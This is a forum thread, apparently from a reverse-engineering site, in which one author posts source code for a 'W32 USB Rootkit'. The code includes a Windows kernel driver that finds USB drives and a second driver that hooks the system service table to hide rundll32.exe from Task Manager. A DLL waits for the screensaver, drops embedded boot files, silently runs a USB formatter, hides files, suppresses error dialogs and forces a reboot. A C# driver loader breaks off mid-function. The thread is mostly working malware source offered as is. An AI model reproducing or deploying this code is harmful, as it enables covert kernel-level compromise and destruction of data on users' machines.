Jump to content
View in the app

A better way to browse. Learn more.
Tuts 4 You

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

W32 USB Rootkit

JMC31337
JMC31337
in Malware Reverse Engineering

Featured Replies

Posted

USB Rootkit (minus the extras)

2 sys files

1 Dll

1 Exe dropper

  • Author

This searches for a usb loaded. Once found it writes a file 0wned.txt then writes the corresponding drive letter to the file. This is so the callback from dll to driver can accomplish its function


#include <ntddk.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <malloc.h>
#define IOError	  -1
#define MEMORYError  -2
#define NOError	    0
#define BUFFER_SIZE 4
//========================
    char *p;
    HANDLE fHandle; // handle to file
    OBJECT_ATTRIBUTES ObjectAttributes; // object attributes
    UNICODE_STRING FileName; // file name
    IO_STATUS_BLOCK ioStatusBlock; // IO status block
    char *myString;
//========================
UNICODE_STRING symbolic_nameC;
UNICODE_STRING VolumeNameC;
UNICODE_STRING symbolic_nameD;
UNICODE_STRING VolumeNameD;
UNICODE_STRING symbolic_nameE;
UNICODE_STRING VolumeNameE;
UNICODE_STRING symbolic_nameF;
UNICODE_STRING VolumeNameF;
UNICODE_STRING symbolic_nameG;
UNICODE_STRING VolumeNameG;
UNICODE_STRING symbolic_nameH;
UNICODE_STRING VolumeNameH;
WCHAR Buffer[40];
WCHAR Buffer1[40];
WCHAR Buffer2[40];
WCHAR Buffer3[40];
WCHAR Buffer4[40];
WCHAR Buffer5[40];
ULONG majorVersion;
ULONG minorVersion;
ANSI_STRING key;
PCSTR keyname;
//==========================
VOID QuerySym(PUNICODE_STRING SymName,PUNICODE_STRING VolumeName)
{
    NTSTATUS st;
    HANDLE LinkHandle;
    OBJECT_ATTRIBUTES object_attributes;
    ULONG rt;
    InitializeObjectAttributes(
	    &object_attributes,
	    SymName,
	    OBJ_KERNEL_HANDLE,
	    NULL,
	    NULL);
    st = ZwOpenSymbolicLinkObject(&LinkHandle,GENERIC_READ,&object_attributes);
    if (!NT_SUCCESS(st))
    {
DbgPrint("OpenSymbolic Error!\n");
	    ZwClose(LinkHandle);
	    return;
    }
    st = ZwQuerySymbolicLinkObject(LinkHandle,VolumeName,&rt);
    if (!NT_SUCCESS(st))
    {
	    if (st == STATUS_BUFFER_TOO_SMALL)
		    DbgPrint("Buffer Error!\n");
	    else
		    DbgPrint("QuerySymbolic Error!\n");
	    return;
    }
    ZwClose(LinkHandle);
}
//==========================
VOID Unload(PDRIVER_OBJECT DriverObject)
{
IoDeleteDevice(DriverObject->DeviceObject);
}
//===========================
extern DriveType()
{
    RtlInitUnicodeString(&symbolic_nameC,L"\\??\\C:");
    RtlInitUnicodeString(&symbolic_nameD,L"\\??\\D:");
    RtlInitUnicodeString(&symbolic_nameE,L"\\??\\E:");
    RtlInitUnicodeString(&symbolic_nameF,L"\\??\\F:");
    RtlInitUnicodeString(&symbolic_nameG,L"\\??\\G:");
    RtlInitUnicodeString(&symbolic_nameH,L"\\??\\H:");    RtlInitEmptyUnicodeString(&VolumeNameC,Buffer,256*sizeof(WCHAR));
    RtlInitEmptyUnicodeString(&VolumeNameD,Buffer1,256*sizeof(WCHAR));
    RtlInitEmptyUnicodeString(&VolumeNameE,Buffer2,256*sizeof(WCHAR));
    RtlInitEmptyUnicodeString(&VolumeNameF,Buffer3,256*sizeof(WCHAR));
    RtlInitEmptyUnicodeString(&VolumeNameG,Buffer4,256*sizeof(WCHAR));
    RtlInitEmptyUnicodeString(&VolumeNameH,Buffer5,256*sizeof(WCHAR));
    QuerySym(&symbolic_nameC,&VolumeNameC);
    QuerySym(&symbolic_nameD,&VolumeNameD);
    QuerySym(&symbolic_nameE,&VolumeNameE);
    QuerySym(&symbolic_nameF,&VolumeNameF);
    QuerySym(&symbolic_nameG,&VolumeNameG);
    QuerySym(&symbolic_nameH,&VolumeNameH); 
//============================================== 
DbgPrint("VolumeNameC->%wZ\n",&VolumeNameC);
RtlUnicodeStringToAnsiString( &key, &VolumeNameC, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
    myString="C";
    if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
    RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
    InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
    ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
	    &ioStatusBlock, NULL,
	    FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
	    FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
			    strlen(myString), NULL, NULL);
    ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//==============================================
DbgPrint("VolumeNameD->%wZ\n",&VolumeNameD);
RtlUnicodeStringToAnsiString( &key, &VolumeNameD, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
    myString="D";
    if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
    RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
    InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
    ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
	    &ioStatusBlock, NULL,
	    FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
	    FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
			    strlen(myString), NULL, NULL);
    ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//==============================================
DbgPrint("VolumeNameE->%wZ\n",&VolumeNameE);
RtlUnicodeStringToAnsiString( &key, &VolumeNameE, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
    myString="E";
    if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
    RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
    InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
    ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
	    &ioStatusBlock, NULL,
	    FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
	    FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
			    strlen(myString), NULL, NULL);
    ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//==============================================
DbgPrint("VolumeNameF->%wZ\n",&VolumeNameF);
RtlUnicodeStringToAnsiString( &key, &VolumeNameF, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
    myString="F";
    if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
    RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
    InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
    ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
	    &ioStatusBlock, NULL,
	    FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
	    FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
			    strlen(myString), NULL, NULL);
    ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//========================
DbgPrint("VolumeNameG->%wZ\n",&VolumeNameG);
RtlUnicodeStringToAnsiString( &key, &VolumeNameG, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
    myString="G";
    if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
    RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
    InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
    ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
	    &ioStatusBlock, NULL,
	    FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
	    FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
			    strlen(myString), NULL, NULL);
    ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//===========================
DbgPrint("VolumeNameH->%wZ\n",&VolumeNameH);
RtlUnicodeStringToAnsiString( &key, &VolumeNameH, TRUE);
keyname=key.Buffer;
if (strstr(keyname,"DP"))
{
DbgPrint("FOUND USB!!!");
    myString="H";
    if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE;
    RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT");
    InitializeObjectAttributes( &ObjectAttributes, &FileName,
		   OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );
    ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes,
	    &ioStatusBlock, NULL,
	    FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,
	    FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
	 ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString,
			    strlen(myString), NULL, NULL);
    ZwClose(fHandle);
}
RtlFreeAnsiString(&key);
//==========================
return 0;
} //END OF THIS FUNCTION//===========================
NTSTATUS abcDevice(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
IO_STACK_LOCATION *irpStack;
long *inputBuffer;
long pid,ioControlCode;
irpStack = IoGetCurrentIrpStackLocation (Irp);
inputBuffer = (long *)Irp-> AssociatedIrp.SystemBuffer;
pid = *inputBuffer;
if(pid==123)
{
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
DbgPrint("abcDevice pid=%d code=%d MajorFunction=%d",pid,ioControlCode,irpStack->MajorFunction);
DriveType();
}
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS; 
}
//=====================================
NTSTATUS abcCreate(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
DbgPrint("abcCreate");
return STATUS_SUCCESS; 
}
//======================================
NTSTATUS DriverEntry(PDRIVER_OBJECT  d,PUNICODE_STRING p)
{
UNICODE_STRING devicename,filename;
PDEVICE_OBJECT r;
DbgPrint("DriverObject");
RtlInitUnicodeString(&devicename,L"\\Device\\bbb");
RtlInitUnicodeString(&filename,L"\\DosDevices\\aaa");
IoCreateDevice(d,0,&devicename,0,0,0,&r);
IoCreateSymbolicLink (&filename,&devicename);
d->MajorFunction[IRP_MJ_CREATE]=abcCreate;
d->MajorFunction[IRP_MJ_DEVICE_CONTROL]=abcDevice;
d->DriverUnload = Unload;
return STATUS_SUCCESS;
}

Edited by JMC31337

  • Author

This hides whatver program is listed from task manager. Code is from vijaymukhi (with error fixed)


#include <ntddk.h>
#include <stdio.h>
long no;
char *p;
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(ULONG SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
typedef struct
{
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} sdt;
__declspec(dllimport) sdt KeServiceDescriptorTable;
typedef NTSTATUS (*qtype)(ULONG SystemInformationCLass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
qtype OldZwQuerySystemInformation;
struct _SYSTEM_PROCESSES
{
ULONG   NextEntryDelta;
ULONG   ThreadCount;
ULONG   Reserved[6];
LARGE_INTEGER   CreateTime;
LARGE_INTEGER   UserTime;
LARGE_INTEGER   KernelTime;
UNICODE_STRING  ProcessName;
};
NTSTATUS NewZwQuerySystemInformation(ULONG SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength)
{
NTSTATUS rc;
rc = OldZwQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
if(rc == 0 && 5 == SystemInformationClass)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(1)
{
ANSI_STRING process_name;
RtlUnicodeStringToAnsiString (&process_name,&curr->ProcessName,TRUE);
//DbgPrint("%s curr=%x prev=%x Delta=%d",process_name.Buffer,curr,prev,curr->NextEntryDelta);
if(strncmp(process_name.Buffer,"rundll32.exe",4) == 0)
{
if(curr->NextEntryDelta != 0 && prev != 0) //first guy has no name
{
//DbgPrint("Between %s curr->NextEntryDelta=%x prev=%x",process_name.Buffer,curr->NextEntryDelta,prev);
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
//DbgPrint("Last");
prev->NextEntryDelta = 0;
}
}
prev = curr;
if ( curr->NextEntryDelta)
((char *)curr += curr->NextEntryDelta);
else
break;
}
}
return rc;
}
NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
{
DbgPrint("IRP_MJ_CREATE\n");
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return(STATUS_SUCCESS);
}
VOID DriverUnload(PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unloading");
_asm cli
KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)OldZwQuerySystemInformation;
_asm sti
}
NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath)
{
driverObject->DriverUnload = DriverUnload;
driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;
DbgPrint("Vijay 2 KeServiceDescriptorTable=%x",KeServiceDescriptorTable);
p = (char *)ZwQuerySystemInformation;
p = p + 1;
no = *(long *)p;
OldZwQuerySystemInformation=(qtype)KeServiceDescriptorTable.ServiceTableBase[no];
_asm cli
KeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)NewZwQuerySystemInformation;
_asm sti
return(STATUS_SUCCESS);
}

Edited by JMC31337

  • Author

DLL file to communicate with the kernel driver and low level disk. Also writes a few files (that are not included for MessageBoard Policy reasons) to the usb. Originally i had NTFS4DOS and a USB formatter to erase then load DOS 16 and further call reboot upon screensaver detection.

#include "dllhell.h"
#define _WIN32_WINXP 0x0500
#include <string.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <fstream>
#include <iostream>
#include <sys/stat.h>
#include <tlhelp32.h>
#include "MBRLOAD.H"
#include "COMMANDC.H"
#include "IOSYS.H"
#include "MSDOSYS.H"
#include "KEYB.H"
#include "KEYBSYS.H"
#include "LOADERZ.H"
#include "AUTOBAT.H"
#include "ROOTIT.H"
#include "LIC.H"
#include "LNGINTL.H"
#define SPI_GETSCREENSAVERRUNNING 0x0072
SC_HANDLE m,s;HANDLE g;DWORD b,pid;
// a sample exported function
bool lvRunning;
char dl[1]={'\0'};
char dl2[1]={'\0'};
char txt[100]={'\0'};
char txtA[50]={'\0'};char txtB[50]={'\0'};char txtC[50]={'\0'};
char txtD[50]={'\0'};char txtE[50]={'\0'};char txtF[50]={'\0'};
char txtG[50]={'\0'};char txtH[50]={'\0'};char txtI[50]={'\0'};
char txtJ[50]={'\0'};char txtK[50]={'\0'};char txtL[50]={'\0'};
HWND msnf = FindWindow("#32770", "Windows - Drive not Ready");
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam)
{
  hwnd = FindWindow("#32770", "Windows - Drive not Ready");
	 SendMessage(hwnd, WM_CLOSE, WM_CLOSE, 0);
}
bool Checkit()
{
SystemParametersInfo(SPI_GETSCREENSAVERRUNNING,0,&lvRunning,0);
if (lvRunning)
{
return true;
}
return false;
}
void CreateEm()
{
	 try{
	 CreateDirectory("\\Solara",NULL);
}catch(char * err){}
//========================			  
try{
	FILE *file;
	if ((file = fopen("\\Solara\\mbrload.exe", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
	   }
	fwrite(MBRLOAD, 1, MBRLOAD_LEN, file);
	fclose(file);
	}catch(char * err){}
//========================  
try{
	FILE *file2;
	if ((file2 = fopen("\\Solara\\command.com", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(commandcom, 1, COMMANDCOM_LEN, file2);
	fclose(file2);
	}catch(char * err){}
//========================  
try{
	FILE *file3;
	if ((file3 = fopen("\\Solara\\io.sys", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(iosys, 1, IOSYS_LEN, file3);
	fclose(file3);
}catch(char * err){}
//========================  
try{
	FILE *file4;
	if ((file4 = fopen("\\Solara\\msdos.sys", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(msdosys, 1, MSDOSYS_LEN, file4);
	fclose(file4);
	}catch(char * err){}
//========================  
try{
	FILE *file5;
	if ((file5 = fopen("\\Solara\\keyb.com", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(keyb, 1, KEYB_LEN, file5);
	fclose(file5);
	}catch(char * err){}
//========================  
try{
	FILE *file6;
	if ((file6 = fopen("\\Solara\\keyboard.sys", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(keybsys, 1, KEYBSYS_LEN, file6);
	fclose(file6);
	}catch(char * err){}
//========================
try{
	FILE *file7;
	if ((file7 = fopen("\\Solara\\loadexec.com", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(loaderz, 1, LOADERZ_LEN, file7);
	fclose(file7);
	}catch(char * err){}
//========================
try{
	FILE *file8;
	if ((file8 = fopen("\\Solara\\autoexec.bat", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(autobat, 1, AUTOBAT_LEN, file8);
	fclose(file8);
	}catch(char * err){}
//========================
try{
	FILE *file9;
	if ((file9 = fopen("\\Solara\\ntfs4dos.exe", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(rootit, 1, ROOTIT_LEN, file9);
	fclose(file9);
	}catch(char * err){}
//========================  
try{
	FILE *file10;
	if ((file10 = fopen("\\Solara\\LICENSE.DAT", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(lic, 1, LIC_LEN, file10);
	fclose(file10);
	}catch(char * err){}
//========================
	try{
	FILE *file11;
	if ((file11 = fopen("\\Solara\\LNGINTL.DAT", "w+b")) == NULL) {
			fprintf(stderr, "Cant open output file.\n");
			//return 1;
				 }
	fwrite(lngintl, 1, LNGINTL_LEN, file11);
	fclose(file11);
	}catch(char * err){}
}//END FILE STUFF
void ReadIT()
{
try
{
std::ifstream fin("\\0WN3ED.txt");
fin>>dl;
fin.close();
}
catch(char * err){}
}
//====================
void KillIT()
{
try{
remove( "\\Solara\\LNGINTL.DAT" );
}catch(char * ex){}
try{
remove( "\\Solara\\ntfs4dos.exe" );
}catch(char * ex){}
try{
remove( "\\Solara\\autoexec.bat" );
}catch(char * ex){}
try{
remove( "\\Solara\\loadexec.com" );
}catch(char * ex){}
try{
remove( "\\Solara\\command.com" );
}catch(char * ex){}
try{
remove( "\\Solara\\io.sys" );
}catch(char * ex){}
try{
remove( "\\Solara\\msdos.sys" );
}catch(char * ex){}
try{
remove( "\\Solara\\keyboard.sys" );
}catch(char * ex){}
try{
remove( "\\Solara\\keyb.com" );
}catch(char * ex){}
try{
remove( "\\Solara\\mbrload.exe" );
}catch(char * ex){}
try{
remove( "\\Solara\\LICENSE.DAT" );
}catch(char * ex){}try
{
std::ifstream fin2("\\0WN3ED.txt");
fin2>>dl2;
fin2.close();
}
catch(char * err){}strcat(txtA,dl2);
strcat(txtA,":\\LICENSE.DAT");
SetFileAttributes(txtA,2);
Sleep(500);
strcat(txtB,dl2);
strcat(txtB,":\\command.com");
SetFileAttributes(txtB,2);
Sleep(500);
strcat(txtC,dl2);
strcat(txtC,":\\io.sys");
SetFileAttributes(txtC,2);
Sleep(500);
strcat(txtD,dl2);
strcat(txtD,":\\msdos.sys");
SetFileAttributes(txtD,2);
Sleep(500);
strcat(txtE,dl2);
strcat(txtE,":\\keyb.com");
SetFileAttributes(txtE,2);
Sleep(500);
strcat(txtF,dl2);
strcat(txtF,":\\msdos.sys");
SetFileAttributes(txtF,2);
Sleep(500);
strcat(txtG,dl2);
strcat(txtG,":\\ntfs4dos.exe");
SetFileAttributes(txtG,2);
Sleep(500);
strcat(txtH,dl2);
strcat(txtH,":\\LNGINTL.DAT");
SetFileAttributes(txtH,2);
Sleep(500);
strcat(txtI,dl2);
strcat(txtI,":\\autoexec.bat");
SetFileAttributes(txtI,2);
Sleep(500);
strcat(txtJ,dl2);
strcat(txtJ,":\\keyboard.sys");
SetFileAttributes(txtJ,2);
Sleep(500);
strcat(txtK,dl2);
strcat(txtK,":\\loadexec.com");
SetFileAttributes(txtK,2);
Sleep(500);
strcat(txtL,dl2);
strcat(txtL,":\\mbrload.exe");
SetFileAttributes(txtL,2);
try{
remove( "\\0WN3ED.txt" );
}catch(char * ex){}
}
//====================
int DLL_EXPORT MsgBox(int x = 0)
{
while(1)
{
Sleep(10000);
  if(Checkit()==true)	
  {
	   CreateEm();
	   pid = 123;
//	 m=OpenSCManager(0,0,SC_MANAGER_ALL_ACCESS );
//	CreateService(m,"vijay","mukhi",SERVICE_ALL_ACCESS,SERVICE_KERNEL_DRIVER,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,"",0,0,0,0,0);
//	s=OpenService(m,"vijay",SERVICE_ALL_ACCESS);
//	StartService(s, 0, 0);
	 g=CreateFile("\\\\.\\aaa",GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,0);
	 DeviceIoControl(g,2,(void *)&pid,4,0,0,&b,0);
	 goto end;
		}
}
end:
ReadIT();
if(dl!=NULL)
{
strcat(txt,dl);
strcat(txt, ": -FS:fat32 -V:USBBRK -B:\\Solara -S:\\Solara -Y");
	HINSTANCE hInst = ShellExecute(0,						
								   "open",				  
								   "\\Solara\\mbrload.exe",
								   txt,
								   0,						
								   SW_HIDE);
}
for(long xx=0;xx<100000;xx++)
{
EnumChildWindows(msnf, EnumChildProc, 0);
}
KillIT();
system("shutdown -r -t 0");
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
			// attach to process
			// return FALSE to fail DLL load
			break;
		case DLL_PROCESS_DETACH:
			// detach from process
			break;
		case DLL_THREAD_ATTACH:
			// attach to thread
			break;
		case DLL_THREAD_DETACH:
			// detach from thread
			break;
	}
	return TRUE; // successful
}

Edited by JMC31337

  • Author

This is the C# sys driver loader and DLLHell (dll file) dropper and execution code


//EFREEDOM . COM
using System;
using System.Diagnostics;
using System.Collections;
using System.Runtime.InteropServices;
using System.Management;
using System.ServiceProcess;
using System.Threading;
using System.IO;
class Win32Driver : IDisposable
    {
	    string driverName;
	    string execPath;
	    IntPtr fileHandle;
	    public Win32Driver(string driver, string driverExecPath)
	    {
		    this.driverName = driver;
		    this.execPath = driverExecPath;
	    }
	    ~Win32Driver()
	    {
		    // BUG - should never rely on finalizer to clean-up unmanaged resources
		    Dispose();
	    }
	    private void CloseStuff()
	    {
		    if (fileHandle != INVALID_HANDLE_VALUE)
		    {
			    fileHandle = INVALID_HANDLE_VALUE;
			    CloseHandle(fileHandle);
		    }
	    }	    public void Dispose()
	    {
		    CloseStuff();
		    GC.SuppressFinalize(this);
	    }
	    private readonly static IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1);
	    private const int STANDARD_RIGHTS_REQUIRED = 0x000F0000;
	    private const int SC_MANAGER_CONNECT = 0x0001;
	    private const int SC_MANAGER_CREATE_SERVICE = 0x0002;
	    private const int SC_MANAGER_ENUMERATE_SERVICE = 0x0004;
	    private const int SC_MANAGER_LOCK = 0x0008;
	    private const int SC_MANAGER_QUERY_LOCK_STATUS = 0x0010;
	    private const int SC_MANAGER_MODIFY_BOOT_CONFIG = 0x0020;
	    private const int SC_MANAGER_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED |
	    SC_MANAGER_CONNECT |
	    SC_MANAGER_CREATE_SERVICE |
	    SC_MANAGER_ENUMERATE_SERVICE |
	    SC_MANAGER_LOCK |
	    SC_MANAGER_QUERY_LOCK_STATUS |
	    SC_MANAGER_MODIFY_BOOT_CONFIG;	    private const int SERVICE_QUERY_CONFIG = 0x0001;
	    private const int SERVICE_CHANGE_CONFIG = 0x0002;
	    private const int SERVICE_QUERY_STATUS = 0x0004;
	    private const int SERVICE_ENUMERATE_DEPENDENTS = 0x0008;
	    private const int SERVICE_START = 0x0010;
	    private const int SERVICE_STOP = 0x0020;
	    private const int SERVICE_PAUSE_CONTINUE = 0x0040;
	    private const int SERVICE_INTERROGATE = 0x0080;
	    private const int SERVICE_USER_DEFINED_CONTROL = 0x0100;	    private const int SERVICE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED
	    |
	    SERVICE_QUERY_CONFIG |
	    SERVICE_CHANGE_CONFIG |
	    SERVICE_QUERY_STATUS |
	    SERVICE_ENUMERATE_DEPENDENTS |
	    SERVICE_START |
	    SERVICE_STOP |
	    SERVICE_PAUSE_CONTINUE |
	    SERVICE_INTERROGATE |
	    SERVICE_USER_DEFINED_CONTROL;	    private const int SERVICE_DEMAND_START = 0x00000003;
	    private const int SERVICE_KERNEL_DRIVER = 0x00000001;
	    private const int SERVICE_ERROR_NORMAL = 0x00000001;	    private const uint GENERIC_READ = 0x80000000;
	    private const uint FILE_SHARE_READ = 1;
	    private const uint FILE_SHARE_WRITE = 2;
	    private const uint OPEN_EXISTING = 3;
	    private const uint IOCTL_SHOCKMGR_READ_ACCELEROMETER_DATA = 0x733fc;
	    private const int FACILITY_WIN32 = unchecked((int)0x80070000);
	    private IntPtr handle = INVALID_HANDLE_VALUE;	    [DllImport("advapi32", SetLastError = true)]
	    internal static extern IntPtr OpenSCManager(string machineName, string
	    databaseName, uint dwDesiredAccess);	    [DllImport("advapi32", SetLastError = true)]
	    internal static extern IntPtr CreateService(IntPtr hSCManager, string
	    serviceName, string displayName,
	    uint dwDesiredAccess, uint serviceType, uint startType, uint
	    errorControl,
	    string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId,
	    string lpDependencies,
	    string lpServiceStartName, string lpPassword);	    [DllImport("advapi32")]
	    internal static extern bool CloseServiceHandle(IntPtr handle);	    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
	    static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess);	    [DllImport("kernel32", SetLastError = true)]
	    internal static extern IntPtr CreateFile(string lpFileName, uint
	    dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes, uint
	    dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);
	    [DllImport("kernel32")]
	    internal static extern void CloseHandle(IntPtr handle);	    [DllImport("kernel32", SetLastError = true)]
	    private static extern bool DeviceIoControl(IntPtr hDevice, uint
	    dwIoControlCode, IntPtr lpInBuffer, uint nInBufferSize, IntPtr lpOutBuffer,
	    uint nOutBufferSize, ref uint lpBytesReturned, IntPtr lpOverlapped);
	    internal bool LoadDeviceDriver()
	    {
	    IntPtr scHandle = OpenSCManager(null, null, SC_MANAGER_ALL_ACCESS);	    Console.WriteLine("OpenSCManager: " + scHandle);	    if (scHandle != INVALID_HANDLE_VALUE)
	    {
	    IntPtr hService = CreateService(scHandle, this.driverName,
									    this.driverName, SERVICE_ALL_ACCESS
									    , SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL
									    ,execPath, null, null, null, null, null);	    Console.WriteLine("CreateService: " + hService);	    hService = OpenService(scHandle, this.driverName,
					   SERVICE_START | SERVICE_STOP);	    Console.WriteLine("OpenService: "+hService);
	    if (hService != IntPtr.Zero)
	    {
	    CloseServiceHandle(hService); // close both handles
	    CloseServiceHandle(scHandle);
	    // Start the driver using System.Management (WMI)
	    if (ExecuteSCMOperationOnDriver(this.driverName, "StartService") == 0)
	    {
		    return true;
	    }
	    }
	    else
	    if (Marshal.GetLastWin32Error()== 1073) // Driver/Service already in DB
	    {
		    Console.WriteLine("Marshal=1073");
	    CloseServiceHandle(scHandle);
	    // Start the driver using System.Management (WMI)
	    if (ExecuteSCMOperationOnDriver(this.driverName, "StartService") == 0)
	    {
		    return true;
	    }
	    }
	    Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error()));
	    }
	    return false;
	    }	    internal bool UnloadDeviceDriver()
	    {
